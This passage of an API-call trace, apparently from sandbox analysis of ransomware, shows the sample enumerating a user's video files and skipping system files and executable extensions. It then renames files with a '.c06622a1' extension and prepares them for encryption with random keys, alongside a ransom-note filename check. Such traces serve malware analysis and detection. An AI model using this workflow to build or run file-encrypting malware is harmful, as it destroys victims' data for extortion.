(_String="ntuser.ini") returned 0xa [0168.247] _wcsicmp (_Str1="thumbs.db", _Str2="hJBPINTz49_rMgysH5.avi") returned 12 [0168.247] wcslen (_String="thumbs.db") returned 0x9 [0168.247] _wcsicmp (_Str1="386", _Str2="avi") returned -46 [0168.247] wcslen (_String="386") returned 0x3 [0168.247] _wcsicmp (_Str1="adv", _Str2="avi") returned -18 [0168.247] wcslen (_String="adv") returned 0x3 [0168.247] _wcsicmp (_Str1="ani", _Str2="avi") returned -8 [0168.247] wcslen (_String="ani") returned 0x3 [0168.248] _wcsicmp (_Str1="bat", _Str2="avi") returned 1 [0168.248] wcslen (_String="bat") returned 0x3 [0168.248] _wcsicmp (_Str1="bin", _Str2="avi") returned 1 [0168.248] wcslen (_String="bin") returned 0x3 [0168.248] _wcsicmp (_Str1="cab", _Str2="avi") returned 2 [0168.248] wcslen (_String="cab") returned 0x3 [0168.248] _wcsicmp (_Str1="cmd", _Str2="avi") returned 2 [0168.248] wcslen (_String="cmd") returned 0x3 [0168.248] _wcsicmp (_Str1="com", _Str2="avi") returned 2 [0168.248] wcslen (_String="com") returned 0x3 [0168.248] _wcsicmp (_Str1="cpl", _Str2="avi") returned 2 [0168.248] wcslen (_String="cpl") returned 0x3 [0168.248] _wcsicmp (_Str1="cur", _Str2="avi") returned 2 [0168.248] wcslen (_String="cur") returned 0x3 [0168.248] _wcsicmp (_Str1="deskthemepack", _Str2="avi") returned 3 [0168.248] wcslen (_String="deskthemepack") returned 0xd [0168.248] _wcsicmp (_Str1="diagcab", _Str2="avi") returned 3 [0168.248] wcslen (_String="diagcab") returned 0x7 [0168.248] _wcsicmp (_Str1="diagcfg", _Str2="avi") returned 3 [0168.248] wcslen (_String="diagcfg") returned 0x7 [0168.248] _wcsicmp (_Str1="diagpkg", _Str2="avi") returned 3 [0168.248] wcslen (_String="diagpkg") returned 0x7 [0168.248] _wcsicmp (_Str1="dll", _Str2="avi") returned 3 [0168.248] wcslen (_String="dll") returned 0x3 [0168.248] _wcsicmp (_Str1="drv", _Str2="avi") returned 3 [0168.248] wcslen (_String="drv") returned 0x3 [0168.248] _wcsicmp (_Str1="exe", _Str2="avi") returned 4 [0168.248] wcslen (_String="exe") returned 0x3 [0168.248] _wcsicmp (_Str1="hlp", _Str2="avi") returned 7 [0168.248] wcslen (_String="hlp") returned 0x3 [0168.248] _wcsicmp (_Str1="icl", _Str2="avi") returned 8 [0168.248] wcslen (_String="icl") returned 0x3 [0168.248] _wcsicmp (_Str1="icns", _Str2="avi") returned 8 [0168.248] wcslen (_String="icns") returned 0x4 [0168.248] _wcsicmp (_Str1="ico", _Str2="avi") returned 8 [0168.248] wcslen (_String="ico") returned 0x3 [0168.249] _wcsicmp (_Str1="ics", _Str2="avi") returned 8 [0168.249] wcslen (_String="ics") returned 0x3 [0168.249] _wcsicmp (_Str1="idx", _Str2="avi") returned 8 [0168.249] wcslen (_String="idx") returned 0x3 [0168.249] _wcsicmp (_Str1="ldf", _Str2="avi") returned 11 [0168.249] wcslen (_String="ldf") returned 0x3 [0168.249] _wcsicmp (_Str1="lnk", _Str2="avi") returned 11 [0168.249] wcslen (_String="lnk") returned 0x3 [0168.249] _wcsicmp (_Str1="mod", _Str2="avi") returned 12 [0168.249] wcslen (_String="mod") returned 0x3 [0168.249] _wcsicmp (_Str1="mpa", _Str2="avi") returned 12 [0168.249] wcslen (_String="mpa") returned 0x3 [0168.249] _wcsicmp (_Str1="msc", _Str2="avi") returned 12 [0168.249] wcslen (_String="msc") returned 0x3 [0168.249] _wcsicmp (_Str1="msp", _Str2="avi") returned 12 [0168.249] wcslen (_String="msp") returned 0x3 [0168.249] _wcsicmp (_Str1="msstyles", _Str2="avi") returned 12 [0168.249] wcslen (_String="msstyles") returned 0x8 [0168.249] _wcsicmp (_Str1="msu", _Str2="avi") returned 12 [0168.249] wcslen (_String="msu") returned 0x3 [0168.249] _wcsicmp (_Str1="nls", _Str2="avi") returned 13 [0168.249] wcslen (_String="nls") returned 0x3 [0168.249] _wcsicmp (_Str1="nomedia", _Str2="avi") returned 13 [0168.249] wcslen (_String="nomedia") returned 0x7 [0168.249] _wcsicmp (_Str1="ocx", _Str2="avi") returned 14 [0168.249] wcslen (_String="ocx") returned 0x3 [0168.249] _wcsicmp (_Str1="prf", _Str2="avi") returned 15 [0168.249] wcslen (_String="prf") returned 0x3 [0168.249] _wcsicmp (_Str1="ps1", _Str2="avi") returned 15 [0168.249] wcslen (_String="ps1") returned 0x3 [0168.249] _wcsicmp (_Str1="rom", _Str2="avi") returned 17 [0168.249] wcslen (_String="rom") returned 0x3 [0168.249] _wcsicmp (_Str1="rtp", _Str2="avi") returned 17 [0168.249] wcslen (_String="rtp") returned 0x3 [0168.249] _wcsicmp (_Str1="scr", _Str2="avi") returned 18 [0168.249] wcslen (_String="scr") returned 0x3 [0168.250] _wcsicmp (_Str1="shs", _Str2="avi") returned 18 [0168.250] wcslen (_String="shs") returned 0x3 [0168.250] _wcsicmp (_Str1="spl", _Str2="avi") returned 18 [0168.250] wcslen (_String="spl") returned 0x3 [0168.250] _wcsicmp (_Str1="sys", _Str2="avi") returned 18 [0168.250] wcslen (_String="sys") returned 0x3 [0168.250] _wcsicmp (_Str1="theme", _Str2="avi") returned 19 [0168.250] wcslen (_String="theme") returned 0x5 [0168.250] _wcsicmp (_Str1="themepack", _Str2="avi") returned 19 [0168.250] wcslen (_String="themepack") returned 0x9 [0168.250] _wcsicmp (_Str1="wpx", _Str2="avi") returned 22 [0168.250] wcslen (_String="wpx") returned 0x3 [0168.250] _wcsicmp (_Str1="lock", _Str2="avi") returned 11 [0168.250] wcslen (_String="lock") returned 0x4 [0168.250] _wcsicmp (_Str1="key", _Str2="avi") returned 10 [0168.250] wcslen (_String="key") returned 0x3 [0168.250] _wcsicmp (_Str1="hta", _Str2="avi") returned 7 [0168.250] wcslen (_String="hta") returned 0x3 [0168.250] _wcsicmp (_Str1="msi", _Str2="avi") returned 12 [0168.250] wcslen (_String="msi") returned 0x3 [0168.250] _wcsicmp (_Str1="pdb", _Str2="avi") returned 15 [0168.250] wcslen (_String="pdb") returned 0x3 [0168.250] _wcsicmp (_Str1="sqlite", _Str2="avi") returned 18 [0168.250] wcslen (_String="sqlite") returned 0x6 [0168.250] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz")) returned 0x10 [0168.250] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0168.250] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" [0168.250] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz") returned 0x38 [0168.250] wcscpy (in: _Dest=0x32400d2, _Source="hJBPINTz49_rMgysH5.avi" | out: _Dest="hJBPINTz49_rMgysH5.avi") returned="hJBPINTz49_rMgysH5.avi" [0168.250] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\hJBPINTz49_rMgysH5.avi", dwFileAttributes=0x80) returned 1 [0168.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\hJBPINTz49_rMgysH5.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\hjbpintz49_rmgysh5.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.251] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.251] ReadFile (in: hFile=0x1a8, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0168.252] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x35c4a52f [0168.252] RtlComputeCrc32 (PartialCrc=0xa52f, Buffer=0x32e9a4, Length=0x80) returned 0x5a06fdba [0168.252] RtlComputeCrc32 (PartialCrc=0xfdba, Buffer=0x32e9a4, Length=0x80) returned 0x707469b4 [0168.252] RtlComputeCrc32 (PartialCrc=0x69b4, Buffer=0x32e9a4, Length=0x80) returned 0xc0cee181 [0168.252] RtlComputeCrc32 (PartialCrc=0xe181, Buffer=0x32e9a4, Length=0x80) returned 0x867e2009 [0168.252] CloseHandle (hObject=0x1a8) returned 1 [0168.252] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0168.252] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\hJBPINTz49_rMgysH5.avi" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\hJBPINTz49_rMgysH5.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\hJBPINTz49_rMgysH5.avi" [0168.252] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\hJBPINTz49_rMgysH5.avi") returned 0x4f [0168.252] wcscpy (in: _Dest=0x3250106, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.252] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\hJBPINTz49_rMgysH5.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\hjbpintz49_rmgysh5.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\hJBPINTz49_rMgysH5.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\hjbpintz49_rmgysh5.avi.c06622a1"), dwFlags=0x8) returned 1 [0168.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\hJBPINTz49_rMgysH5.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\hjbpintz49_rmgysh5.avi.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a8 [0168.255] CreateIoCompletionPort (FileHandle=0x1a8, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0168.255] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3710020 [0168.262] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x252bd1a [0168.262] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x564bf8af [0168.262] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3432eb26 [0168.262] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2b31125d [0168.262] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x202cea58 [0168.262] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2c0e91cf [0168.262] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1f24c6c7 [0168.262] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5fe9e9f1 [0168.265] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3710094, Length=0x80) returned 0xe5512980 [0168.265] RtlComputeCrc32 (PartialCrc=0x2980, Buffer=0x3710094, Length=0x80) returned 0xa2ad680a [0168.265] RtlComputeCrc32 (PartialCrc=0x680a, Buffer=0x3710094, Length=0x80) returned 0x805a62c3 [0168.265] RtlComputeCrc32 (PartialCrc=0x62c3, Buffer=0x3710094, Length=0x80) returned 0x2e7f4c67 [0168.265] RtlComputeCrc32 (PartialCrc=0x4c67, Buffer=0x3710094, Length=0x80) returned 0x9703b548 [0168.265] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3710020) returned 1 [0168.265] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0168.265] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0168.265] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbac8c6c0, ftCreationTime.dwHighDateTime=0x1d5e4ed, ftLastAccessTime.dwLowDateTime=0x115807c0, ftLastAccessTime.dwHighDateTime=0x1d5e805, ftLastWriteTime.dwLowDateTime=0x115807c0, ftLastWriteTime.dwHighDateTime=0x1d5e805, nFileSizeHigh=0x0, nFileSizeLow=0x88a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="hXlikYJEoBXEyktj.flv", cAlternateFileName="HXLIKY~1.FLV")) returned 1 [0168.265] _wcsicmp (_Str1="hXlikYJEoBXEyktj.flv", _Str2="README.c06622a1.TXT") returned -10 [0168.265] wcsstr (_Str="hXlikYJEoBXEyktj.flv", _SubStr="README") returned 0x0 [0168.265] _wcsicmp (_Str1="autorun.inf", _Str2="hXlikYJEoBXEyktj.flv") returned -7 [0168.265] wcslen (_String="autorun.inf") returned 0xb [0168.265] _wcsicmp (_Str1="boot.ini", _Str2="hXlikYJEoBXEyktj.flv") returned -6 [0168.265] wcslen (_String="boot.ini") returned 0x8 [0168.265] _wcsicmp (_Str1="bootfont.bin", _Str2="hXlikYJEoBXEyktj.flv") returned -6 [0168.265] wcslen (_String="bootfont.bin") returned 0xc [0168.265] _wcsicmp (_Str1="bootsect.bak", _Str2="hXlikYJEoBXEyktj.flv") returned -6 [0168.266] wcslen (_String="bootsect.bak") returned 0xc [0168.266] _wcsicmp (_Str1="desktop.ini", _Str2="hXlikYJEoBXEyktj.flv") returned -4 [0168.266] wcslen (_String="desktop.ini") returned 0xb [0168.266] _wcsicmp (_Str1="iconcache.db", _Str2="hXlikYJEoBXEyktj.flv") returned 1 [0168.266] wcslen (_String="iconcache.db") returned 0xc [0168.266] _wcsicmp (_Str1="ntldr", _Str2="hXlikYJEoBXEyktj.flv") returned 6 [0168.266] wcslen (_String="ntldr") returned 0x5 [0168.266] _wcsicmp (_Str1="ntuser.dat", _Str2="hXlikYJEoBXEyktj.flv") returned 6 [0168.266] wcslen (_String="ntuser.dat") returned 0xa [0168.266] _wcsicmp (_Str1="ntuser.dat.log", _Str2="hXlikYJEoBXEyktj.flv") returned 6 [0168.266] wcslen (_String="ntuser.dat.log") returned 0xe [0168.266] _wcsicmp (_Str1="ntuser.ini", _Str2="hXlikYJEoBXEyktj.flv") returned 6 [0168.266] wcslen (_String="ntuser.ini") returned 0xa [0168.266] _wcsicmp (_Str1="thumbs.db", _Str2="hXlikYJEoBXEyktj.flv") returned 12 [0168.266] wcslen (_String="thumbs.db") returned 0x9 [0168.266] _wcsicmp (_Str1="386", _Str2="flv") returned -51 [0168.266] wcslen (_String="386") returned 0x3 [0168.266] _wcsicmp (_Str1="adv", _Str2="flv") returned -5 [0168.266] wcslen (_String="adv") returned 0x3 [0168.266] _wcsicmp (_Str1="ani", _Str2="flv") returned -5 [0168.266] wcslen (_String="ani") returned 0x3 [0168.266] _wcsicmp (_Str1="bat", _Str2="flv") returned -4 [0168.266] wcslen (_String="bat") returned 0x3 [0168.266] _wcsicmp (_Str1="bin", _Str2="flv") returned -4 [0168.266] wcslen (_String="bin") returned 0x3 [0168.266] _wcsicmp (_Str1="cab", _Str2="flv") returned -3 [0168.266] wcslen (_String="cab") returned 0x3 [0168.266] _wcsicmp (_Str1="cmd", _Str2="flv") returned -3 [0168.266] wcslen (_String="cmd") returned 0x3 [0168.266] _wcsicmp (_Str1="com", _Str2="flv") returned -3 [0168.266] wcslen (_String="com") returned 0x3 [0168.266] _wcsicmp (_Str1="cpl", _Str2="flv") returned -3 [0168.266] wcslen (_String="cpl") returned 0x3 [0168.266] _wcsicmp (_Str1="cur", _Str2="flv") returned -3 [0168.267] wcslen (_String="cur") returned 0x3 [0168.267] _wcsicmp (_Str1="deskthemepack", _Str2="flv") returned -2 [0168.267] wcslen (_String="deskthemepack") returned 0xd [0168.267] _wcsicmp (_Str1="diagcab", _Str2="flv") returned -2 [0168.267] wcslen (_String="diagcab") returned 0x7 [0168.267] _wcsicmp (_Str1="diagcfg", _Str2="flv") returned -2 [0168.267] wcslen (_String="diagcfg") returned 0x7 [0168.267] _wcsicmp (_Str1="diagpkg", _Str2="flv") returned -2 [0168.267] wcslen (_String="diagpkg") returned 0x7 [0168.267] _wcsicmp (_Str1="dll", _Str2="flv") returned -2 [0168.267] wcslen (_String="dll") returned 0x3 [0168.267] _wcsicmp (_Str1="drv", _Str2="flv") returned -2 [0168.267] wcslen (_String="drv") returned 0x3 [0168.267] _wcsicmp (_Str1="exe", _Str2="flv") returned -1 [0168.267] wcslen (_String="exe") returned 0x3 [0168.267] _wcsicmp (_Str1="hlp", _Str2="flv") returned 2 [0168.267] wcslen (_String="hlp") returned 0x3 [0168.267] _wcsicmp (_Str1="icl", _Str2="flv") returned 3 [0168.267] wcslen (_String="icl") returned 0x3 [0168.267] _wcsicmp (_Str1="icns", _Str2="flv") returned 3 [0168.267] wcslen (_String="icns") returned 0x4 [0168.267] _wcsicmp (_Str1="ico", _Str2="flv") returned 3 [0168.267] wcslen (_String="ico") returned 0x3 [0168.267] _wcsicmp (_Str1="ics", _Str2="flv") returned 3 [0168.267] wcslen (_String="ics") returned 0x3 [0168.267] _wcsicmp (_Str1="idx", _Str2="flv") returned 3 [0168.267] wcslen (_String="idx") returned 0x3 [0168.267] _wcsicmp (_Str1="ldf", _Str2="flv") returned 6 [0168.267] wcslen (_String="ldf") returned 0x3 [0168.267] _wcsicmp (_Str1="lnk", _Str2="flv") returned 6 [0168.267] wcslen (_String="lnk") returned 0x3 [0168.268] _wcsicmp (_Str1="mod", _Str2="flv") returned 7 [0168.268] wcslen (_String="mod") returned 0x3 [0168.268] _wcsicmp (_Str1="mpa", _Str2="flv") returned 7 [0168.268] wcslen (_String="mpa") returned 0x3 [0168.268] _wcsicmp (_Str1="msc", _Str2="flv") returned 7 [0168.268] wcslen (_String="msc") returned 0x3 [0168.268] _wcsicmp (_Str1="msp", _Str2="flv") returned 7 [0168.268] wcslen (_String="msp") returned 0x3 [0168.268] _wcsicmp (_Str1="msstyles", _Str2="flv") returned 7 [0168.268] wcslen (_String="msstyles") returned 0x8 [0168.268] _wcsicmp (_Str1="msu", _Str2="flv") returned 7 [0168.268] wcslen (_String="msu") returned 0x3 [0168.268] _wcsicmp (_Str1="nls", _Str2="flv") returned 8 [0168.268] wcslen (_String="nls") returned 0x3 [0168.268] _wcsicmp (_Str1="nomedia", _Str2="flv") returned 8 [0168.268] wcslen (_String="nomedia") returned 0x7 [0168.268] _wcsicmp (_Str1="ocx", _Str2="flv") returned 9 [0168.268] wcslen (_String="ocx") returned 0x3 [0168.268] _wcsicmp (_Str1="prf", _Str2="flv") returned 10 [0168.268] wcslen (_String="prf") returned 0x3 [0168.268] _wcsicmp (_Str1="ps1", _Str2="flv") returned 10 [0168.268] wcslen (_String="ps1") returned 0x3 [0168.268] _wcsicmp (_Str1="rom", _Str2="flv") returned 12 [0168.268] wcslen (_String="rom") returned 0x3 [0168.268] _wcsicmp (_Str1="rtp", _Str2="flv") returned 12 [0168.268] wcslen (_String="rtp") returned 0x3 [0168.268] _wcsicmp (_Str1="scr", _Str2="flv") returned 13 [0168.268] wcslen (_String="scr") returned 0x3 [0168.269] _wcsicmp (_Str1="shs", _Str2="flv") returned 13 [0168.269] wcslen (_String="shs") returned 0x3 [0168.269] _wcsicmp (_Str1="spl", _Str2="flv") returned 13 [0168.269] wcslen (_String="spl") returned 0x3 [0168.269] _wcsicmp (_Str1="sys", _Str2="flv") returned 13 [0168.269] wcslen (_String="sys") returned 0x3 [0168.269] _wcsicmp (_Str1="theme", _Str2="flv") returned 14 [0168.269] wcslen (_String="theme") returned 0x5 [0168.269] _wcsicmp (_Str1="themepack", _Str2="flv") returned 14 [0168.269] wcslen (_String="themepack") returned 0x9 [0168.269] _wcsicmp (_Str1="wpx", _Str2="flv") returned 17 [0168.269] wcslen (_String="wpx") returned 0x3 [0168.269] _wcsicmp (_Str1="lock", _Str2="flv") returned 6 [0168.269] wcslen (_String="lock") returned 0x4 [0168.269] _wcsicmp (_Str1="key", _Str2="flv") returned 5 [0168.269] wcslen (_String="key") returned 0x3 [0168.269] _wcsicmp (_Str1="hta", _Str2="flv") returned 2 [0168.269] wcslen (_String="hta") returned 0x3 [0168.269] _wcsicmp (_Str1="msi", _Str2="flv") returned 7 [0168.269] wcslen (_String="msi") returned 0x3 [0168.269] _wcsicmp (_Str1="pdb", _Str2="flv") returned 10 [0168.269] wcslen (_String="pdb") returned 0x3 [0168.269] _wcsicmp (_Str1="sqlite", _Str2="flv") returned 13 [0168.269] wcslen (_String="sqlite") returned 0x6 [0168.269] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz")) returned 0x10 [0168.269] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0168.269] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" [0168.269] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz") returned 0x38 [0168.269] wcscpy (in: _Dest=0x32400d2, _Source="hXlikYJEoBXEyktj.flv" | out: _Dest="hXlikYJEoBXEyktj.flv") returned="hXlikYJEoBXEyktj.flv" [0168.269] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\hXlikYJEoBXEyktj.flv", dwFileAttributes=0x80) returned 1 [0168.270] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\hXlikYJEoBXEyktj.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\hxlikyjeobxeyktj.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0168.270] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.270] ReadFile (in: hFile=0x194, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0168.271] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x6c288b4e [0168.271] RtlComputeCrc32 (PartialCrc=0x8b4e, Buffer=0x32e9a4, Length=0x80) returned 0xef66449f [0168.271] RtlComputeCrc32 (PartialCrc=0x449f, Buffer=0x32e9a4, Length=0x80) returned 0xd5f69fe0 [0168.271] RtlComputeCrc32 (PartialCrc=0x9fe0, Buffer=0x32e9a4, Length=0x80) returned 0xdf288f51 [0168.271] RtlComputeCrc32 (PartialCrc=0x8f51, Buffer=0x32e9a4, Length=0x80) returned 0xc4cf33c4 [0168.271] CloseHandle (hObject=0x194) returned 1 [0168.271] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0168.271] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\hXlikYJEoBXEyktj.flv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\hXlikYJEoBXEyktj.flv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\hXlikYJEoBXEyktj.flv" [0168.271] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\hXlikYJEoBXEyktj.flv") returned 0x4d [0168.271] wcscpy (in: _Dest=0x3250102, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.271] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\hXlikYJEoBXEyktj.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\hxlikyjeobxeyktj.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\hXlikYJEoBXEyktj.flv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\hxlikyjeobxeyktj.flv.c06622a1"), dwFlags=0x8) returned 1 [0168.274] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\hXlikYJEoBXEyktj.flv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\hxlikyjeobxeyktj.flv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x194 [0168.274] CreateIoCompletionPort (FileHandle=0x194, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0168.274] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x37a0020 [0168.281] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x767d4613 [0168.281] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7f909622 [0168.281] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4284f7d1 [0168.281] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x562eb3ef [0168.281] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x53f96837 [0168.281] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xa426c25 [0168.281] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x348d6ce2 [0168.281] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x60af7054 [0168.285] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x37a0094, Length=0x80) returned 0xb4d4bbb2 [0168.285] RtlComputeCrc32 (PartialCrc=0xbbb2, Buffer=0x37a0094, Length=0x80) returned 0x184244d1 [0168.285] RtlComputeCrc32 (PartialCrc=0x44d1, Buffer=0x37a0094, Length=0x80) returned 0x23886d0a [0168.285] RtlComputeCrc32 (PartialCrc=0x6d0a, Buffer=0x37a0094, Length=0x80) returned 0xdbe7b269 [0168.285] RtlComputeCrc32 (PartialCrc=0xb269, Buffer=0x37a0094, Length=0x80) returned 0xbe1bc613 [0168.285] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x37a0020) returned 1 [0168.285] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0168.285] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0168.285] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, 